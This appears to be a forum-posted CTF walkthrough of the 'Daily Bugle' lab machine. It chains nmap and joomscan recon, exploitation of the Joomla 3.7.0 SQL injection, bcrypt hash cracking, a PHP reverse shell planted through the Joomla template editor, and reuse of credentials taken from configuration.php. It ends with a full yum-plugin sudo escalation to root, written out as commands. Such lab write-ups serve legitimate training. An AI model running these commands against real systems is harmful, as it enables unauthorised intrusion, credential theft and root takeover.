Daily Bugle Walkthrough - Offensive Pentesting

CTF Walkthroughs
, , ,
1

Reconnaissance

As always, the first step consists of the reconnaissance phase as port scanning.

Ports Scanning

During this step, we’re gonna identify the target to see what we have behind the IP Address.

nmap -sC -sV -oA nmap -Pn 10.10.88.15

image
image1862×628 168 KB 

22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCbp89KqmXj7Xx84uhisjiT7pGPYepXVTr4MnPu1P4fnlWzevm6BjeQgDBnoRVhddsjHhI1k+xdnahjcv6kykfT3mSeljfy+jRc+2ejMB95oK2AGycavgOfF4FLPYtd5J97WqRmu2ZC2sQUvbGMUsrNaKLAVdWRIqO5OO07WIGtr3c2ZsM417TTcTsSh1Cjhx3F+gbgi0BbBAN3sQqySa91AFruPA+m0R9JnDX5rzXmhWwzAM1Y8R72c4XKXRXdQT9szyyEiEwaXyT0p6XiaaDyxT2WMXTZEBSUKOHUQiUhX7JjBaeVvuX4ITG+W8zpZ6uXUrUySytuzMXlPyfMBy8B
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKb+wNoVp40Na4/Ycep7p++QQiOmDvP550H86ivDdM/7XF9mqOfdhWK0rrvkwq9EDZqibDZr3vL8MtwuMVV5Src=
|   256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP4TcvlwCGpiawPyNCkuXTK5CCpat+Bv8LycyNdiTJHX
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
|_http-generator: Joomla! - Open Source Content Management
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open  mysql   syn-ack ttl 63 MariaDB (unauthorized)

Enumerating Port 80

We can start by looking at the webserver. When we go to URL we see Joomla engine installed.

image
image998×883 275 KB

Enumerating Joomla Using Joomscan

perl joomscan.pl -u http://10.10.97.153

image
image879×895 87.7 KB

We know the version is “Joomla 3.7.0” by running joomscan. We can also find the version by reading README.txt.

Searchsploit

This Joomla 3.7 version is vulnerable to SQL injection.

image
image1751×578 130 KB

Exploit-DB

Joomla! 3.7.0 - ‘com_fields’ SQL Injection

Let’s exploit it using SQLMap

image
image986×587 139 KB

While doing Google search I stumble upon a script Joomblah.

python joomblah.py http://10.10.97.153

image
image1127×555 64.8 KB

Running the script returned us a hashed credential and username jonah,

Let’s find out which encryption is it using hashid tool.

hashid hash.txt

image

Cracking bcrypt Hash

Hashcat

Let’s crack our encrypted hash using hashcat -m 3200

hashcat -m 3200 -a0 --force hash.txt /usr/share/wordlists/rockyou.txt

It took a while cracking the hash or else you can use John.

John

john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Ones you’re done cracking the HASH and found your credential let’s login at HTTP:/IP/administrator using jonah and password which you found.

image
image1887×795 83 KB

Exploitation

Now we have to get a reverse shell to get low-privilege access to the machine.

Go to Templates > New File

image
image1317×481 23.9 KB

Insert php-reverse-shell.php inside shell.php which we just created in Joomla.

Now, if you access the URL via http://IP/templates/protostar/shell.php you’ll get a reverse shell.

image
image1060×274 44.5 KB

image

We got 'Permission Denied' while accessing jjameson home directory.

Let’s find credentials for this user.

After doing some digging I came across a configuration.php file inside /var/www/html

image
image664×597 104 KB

Configuration.php usually contains database variables that usually contain like username, password, and database name.

The credential which we found inside configuration.php luckily we can reuse it to 'ssh jjameson'

image
image996×470 96.9 KB

Privilege Escalation

Once we’re in the machine let’s escalate our privilege to root.

The first thing to commonly check is sudo -l to see if root has some kind of special permission.

image
image1830×213 47.6 KB

(ALL) NOPASSWD: /usr/bin/yum

After a quick search, I found a link to GTFObins to become root by running some commands using yum.

image
image684×596 66.7 KB 

[jjameson@dailybugle ~]$ TF=$(mktemp -d)
[jjameson@dailybugle ~]$ cat >$TF/x<<EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
[jjameson@dailybugle ~]$ cat >$TF/y.conf<<EOF
> [main]
> enabled=1
> EOF
[jjameson@dailybugle ~]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
> def init_hook(conduit):
>   os.execl('/bin/sh','/bin/sh')
> EOF
[jjameson@dailybugle ~]$ sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# 
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# wc -c /root/root.txt 
33 /root/root.txt
1 Like